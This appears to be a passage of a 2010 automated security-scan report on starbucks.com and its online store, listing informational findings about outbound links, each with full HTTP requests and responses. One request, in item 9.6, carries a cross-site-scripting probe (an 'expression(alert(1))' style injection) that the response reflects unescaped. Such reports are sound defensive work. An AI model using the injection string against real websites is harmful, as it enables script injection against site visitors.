<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Ftazo%2Dtea%2F">Tazo.. Tea</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0174">Black Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0176">Green Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0973">White Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0178">Herbal Infusions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fequipment%2Easp">Brewing Equipment</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0966">Coffee Presses</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0266">Coffeemakers</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0950">Espresso Machines</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0970">Grinders</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Buying</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE">Drinkware</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHGF&amp;Redir=%2FGiftIdeas%2F">Gift Packs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHMU&amp;Redir=%2Fentertainment%2F">Music CDs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHABT&amp;Redir=%2Fproducts%2Fshabotus%2Easp">About Starbucks Store</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Merchandise+%26+Music">My Starbucks Idea</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA">Enjoy Our Espresso at Home</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA"><img src="http://assets.starbucks.com/assets/095c195acda948c4bee84fd51eb448a5.jpg" alt="Enjoy espresso at home" />
...[SNIP]...
<li><a href="https://www.starbuckscardb2b.com/">Starbucks Card Corporate Sales</a>
...[SNIP]...
<li><a href="http://www.twitter.com/starbucks/">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/starbucks/">Facebook</a>
...[SNIP]...
<li><a href="http://www.youtube.com/starbucks">YouTube</a>
...[SNIP]...
<li><a href="http://mystarbucksidea.force.com/">My Starbucks Idea</a>
...[SNIP]...
<li><a href="http://www.v2v.net/starbucks">Starbucks V2V</a>
...[SNIP]...
<li><a href="http://www.starbucks.at/">Austria/&#214;sterreich</a>
...[SNIP]...
<li><a href="http://www.starbucks.bg/">Bulgaria</a>
...[SNIP]...
<li><a href="http://www.starbucks.ca/">Canada</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.cz/">Czech Republic</a>
...[SNIP]...
<li><a href="http://www.starbucks.fr/">France</a>
...[SNIP]...
<li><a href="http://www.starbucksgermany.com/">Germany/Deutschland</a>
...[SNIP]...
<li><a href="http://www.starbucks.hu/">Hungary</a>
...[SNIP]...
<li><a href="http://www.starbucks.pl/">Poland</a>
...[SNIP]...
<li><a href="http://www.starbucks.pt/">Portugal</a>
...[SNIP]...
<li><a href="http://www.starbucksromania.ro/">Romania</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.ru/">Russia</a>
...[SNIP]...
<li><a href="http://www.istarbucks.co.kr/">South Korea</a>
...[SNIP]...
<li><a href="http://www.starbucks.es/">Spain/Espa&ntilde;a</a>
...[SNIP]...
<li><a href="http://www.starbucks.ch/">Switzerland/Schweiz</a>
...[SNIP]...

9.5. http://www.starbucks.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /search?keywords=%27 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:14:11 GMT
Content-Length: 33615

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</span>
<a href="http://www.addthis.com/bookmark.php?v=250&amp;username=starbucks&amp;url=http://www.starbucks.com/search?keywords='" class="addthis_button_compact" title="Post to AddThis"><img src="/static/images/share-icon-addthis.gif" alt="Share on AddThis" />
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Coffee+%26+Espresso+Drinks">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Food">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Atmosphere+%26+Locations">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Sales</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Starbucks+Card">My Starbucks Idea</a>
...[SNIP]...
<li id="nav_shop"><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTB&amp;Redir=">Shop<br />
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fcoffee%2F">Coffee</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8750">Latin America Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8751">Africa/Arabia Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8752">Asia/Pacific Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0153">Multi-Region Blends</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0171">Specialty Roasts</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fvia%2F">Instant Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Ftazo%2Dtea%2F">Tazo.. Tea</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0174">Black Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0176">Green Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0973">White Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0178">Herbal Infusions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fequipment%2Easp">Brewing Equipment</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0966">Coffee Presses</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0266">Coffeemakers</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0950">Espresso Machines</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0970">Grinders</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Buying</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE">Drinkware</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHGF&amp;Redir=%2FGiftIdeas%2F">Gift Packs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHMU&amp;Redir=%2Fentertainment%2F">Music CDs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHABT&amp;Redir=%2Fproducts%2Fshabotus%2Easp">About Starbucks Store</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Merchandise+%26+Music">My Starbucks Idea</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA">Enjoy Our Espresso at Home</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA"><img src="http://assets.starbucks.com/assets/095c195acda948c4bee84fd51eb448a5.jpg" alt="Enjoy espresso at home" />
...[SNIP]...
<li><a href="https://www.starbuckscardb2b.com/">Starbucks Card Corporate Sales</a>
...[SNIP]...
<li><a href="http://www.twitter.com/starbucks/">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/starbucks/">Facebook</a>
...[SNIP]...
<li><a href="http://www.youtube.com/starbucks">YouTube</a>
...[SNIP]...
<li><a href="http://mystarbucksidea.force.com/">My Starbucks Idea</a>
...[SNIP]...
<li><a href="http://www.v2v.net/starbucks">Starbucks V2V</a>
...[SNIP]...
<li><a href="http://www.starbucks.at/">Austria/&#214;sterreich</a>
...[SNIP]...
<li><a href="http://www.starbucks.bg/">Bulgaria</a>
...[SNIP]...
<li><a href="http://www.starbucks.ca/">Canada</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.cz/">Czech Republic</a>
...[SNIP]...
<li><a href="http://www.starbucks.fr/">France</a>
...[SNIP]...
<li><a href="http://www.starbucksgermany.com/">Germany/Deutschland</a>
...[SNIP]...
<li><a href="http://www.starbucks.hu/">Hungary</a>
...[SNIP]...
<li><a href="http://www.starbucks.pl/">Poland</a>
...[SNIP]...
<li><a href="http://www.starbucks.pt/">Portugal</a>
...[SNIP]...
<li><a href="http://www.starbucksromania.ro/">Romania</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.ru/">Russia</a>
...[SNIP]...
<li><a href="http://www.istarbucks.co.kr/">South Korea</a>
...[SNIP]...
<li><a href="http://www.starbucks.es/">Spain/Espa&ntilde;a</a>
...[SNIP]...
<li><a href="http://www.starbucks.ch/">Switzerland/Schweiz</a>
...[SNIP]...

9.6. http://www.starbucks.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /search?keywords=%2797134"style%3d"x%3aexpression(alert(1))"eb377b674b2 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.starbucks.com
Cookie: ASP.NET_SessionId=new0hf55b2avrbbgt3d0fz45; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:22:55 GMT
Content-Length: 33897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</span>
<a href="http://www.addthis.com/bookmark.php?v=250&amp;username=starbucks&amp;url=http://www.starbucks.com/search?keywords='97134"style="x:expression(alert(1))"eb377b674b2" class="addthis_button_compact" title="Post to AddThis"><img src="/static/images/share-icon-addthis.gif" alt="Share on AddThis" />
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Coffee+%26+Espresso+Drinks">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Food">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Atmosphere+%26+Locations">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Sales</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Starbucks+Card">My Starbucks Idea</a>
...[SNIP]...
<li id="nav_shop"><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTB&amp;Redir=">Shop<br />
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fcoffee%2F">Coffee</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8750">Latin America Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8751">Africa/Arabia Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8752">Asia/Pacific Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0153">Multi-Region Blends</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0171">Specialty Roasts</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fvia%2F">Instant Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Ftazo%2Dtea%2F">Tazo.. Tea</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0174">Black Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0176">Green Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0973">White Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0178">Herbal Infusions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fequipment%2Easp">Brewing Equipment</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0966">Coffee Presses</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0266">Coffeemakers</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0950">Espresso Machines</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0970">Grinders</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Buying</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE">Drinkware</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHGF&amp;Redir=%2FGiftIdeas%2F">Gift Packs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHMU&amp;Redir=%2Fentertainment%2F">Music CDs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHABT&amp;Redir=%2Fproducts%2Fshabotus%2Easp">About Starbucks Store</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Merchandise+%26+Music">My Starbucks Idea</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA">Enjoy Our Espresso at Home</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA"><img src="http://assets.starbucks.com/assets/095c195acda948c4bee84fd51eb448a5.jpg" alt="Enjoy espresso at home" />
...[SNIP]...
<li><a href="https://www.starbuckscardb2b.com/">Starbucks Card Corporate Sales</a>
...[SNIP]...
<li><a href="http://www.twitter.com/starbucks/">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/starbucks/">Facebook</a>
...[SNIP]...
<li><a href="http://www.youtube.com/starbucks">YouTube</a>
...[SNIP]...
<li><a href="http://mystarbucksidea.force.com/">My Starbucks Idea</a>
...[SNIP]...
<li><a href="http://www.v2v.net/starbucks">Starbucks V2V</a>
...[SNIP]...
<li><a href="http://www.starbucks.at/">Austria/&#214;sterreich</a>
...[SNIP]...
<li><a href="http://www.starbucks.bg/">Bulgaria</a>
...[SNIP]...
<li><a href="http://www.starbucks.ca/">Canada</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.cz/">Czech Republic</a>
...[SNIP]...
<li><a href="http://www.starbucks.fr/">France</a>
...[SNIP]...
<li><a href="http://www.starbucksgermany.com/">Germany/Deutschland</a>
...[SNIP]...
<li><a href="http://www.starbucks.hu/">Hungary</a>
...[SNIP]...
<li><a href="http://www.starbucks.pl/">Poland</a>
...[SNIP]...
<li><a href="http://www.starbucks.pt/">Portugal</a>
...[SNIP]...
<li><a href="http://www.starbucksromania.ro/">Romania</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.ru/">Russia</a>
...[SNIP]...
<li><a href="http://www.istarbucks.co.kr/">South Korea</a>
...[SNIP]...
<li><a href="http://www.starbucks.es/">Spain/Espa&ntilde;a</a>
...[SNIP]...
<li><a href="http://www.starbucks.ch/">Switzerland/Schweiz</a>
...[SNIP]...

9.7. http://www.starbucksstore.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /?CCAID=SBPTPAHP1SHTB&Redir= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/coffee/via/flavored-coffee
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive
Cookie: CookingAd=CCREF=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee&CCADATE=20101116&CCAID=SBPTPAHP1SHTB; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21201
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:18:41 GMT

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
   <meta name="description" content="F
...[SNIP]...
<li><a href="http://www.starbucks.com" target="_blank">Starbucks Home</a>
...[SNIP]...
<li><a href="http://www.starbucks.com/retail/find/default.aspx" target="_blank">Our Stores</a>
...[SNIP]...
<li><a href="http://www.starbucks.com/aboutus/" target="_blank">About Us</a>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.vulnerable.ad.partner/activityi;src=2206715;type=starb758;cat=starb781;ord=1;num=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
<!-- START SCANALERT CODE -->
